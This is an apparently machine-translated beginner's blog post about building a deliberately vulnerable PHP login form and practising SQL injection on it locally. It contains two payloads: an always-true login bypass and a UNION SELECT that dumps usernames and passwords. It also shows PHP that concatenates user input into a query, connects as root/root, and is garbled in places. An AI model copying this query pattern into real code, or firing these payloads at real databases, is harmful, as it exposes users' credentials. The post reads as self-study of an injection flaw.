Write a front-end verification, HTML also forgot, the page is written very sketchy, will look at, after all, my life is the first one to write their ownVulnerability。
Main interface, omit to test if he has a loophole.
ID at input: 1 ' or 1=1#
Omit the intermediate step and explode something directly:
Input: 1 ' and 1=2 Union select 1,2,group_concat (Username,0x3a,password) from user#
Here's a sticker for my code :
<title>m3tar's first infusion </title>
<meta http-equiv= "Content-type" content= "text/html" charset= "Unicode" >
<body>
<form action= "m-star.php" method= "POST" >
<table>
<tr>
<td>id</td>
<td><input type= "text" name= "id" ></td>
</tr>
<tr>
<td> User name </td>
<td><input type= "text" name= "username" ></td>
</tr>
<tr>
<td> Password </td>
<td><input type= "password" name= "password" ></td>
</tr>
<tr>
<td><input type= "Submit" value= "Submission" ></td>
<td><input type= "reset" value= "reset" ></td>
</tr>
</table>
</form>
</body>
<?php
if ($_post) {
$con =mysql_connect ("localhost", "root", "root");
mysql_select_db ("CSM", $con);
$id = $_post[' id '];
$sql = "SELECT * from user where id= ' $id '";
$query =mysql_query ($sql, $con);
$arr =mysql_fetch_array ($query, MYSQL_ASSOC);
if (!empty ($arr)) {
Echo ' <pre> ', Print_r ($arr, 1), ' </pre> ';
}else{
echo "Incorrect input";
}
}
?>
Learn a little bit about writing code :
1) PHP: To write this or to have a little bit of knowledge of PHP, for the content of database programming also have some understanding:
Three-tier structure of the database: client MySQL DBMS data object
2) You can summarize the steps of MySQL expansion library operation MySQL Database
3) Understanding of Phpstudy:
Before just phpstudy, know to go to the www throw things, just know can also switch version, very good function, hope later can be more application. Because write a = = This simple SQL injection vulnerability interface, emmm, very uncomfortable, write not to the database, Baidu has a half-day, very melon, the original phpstudy inside can create a new database (PhpMyadmin, Mysql-front), hurriedly follow the Baidu according to gourd painting scoop, The first time I contacted the database of my background, I was very excited. There are other questions that have not been met yet, and will be added later.
4) HTML and CSS feel white learning, all remember, to seize the time to make up AH.
5) post and get parameters respectively advantages and disadvantages http://www.cnblogs.com/hyddd/archive/2009/03/31/1426026.html Detailed can see this information
sql-Front-end verification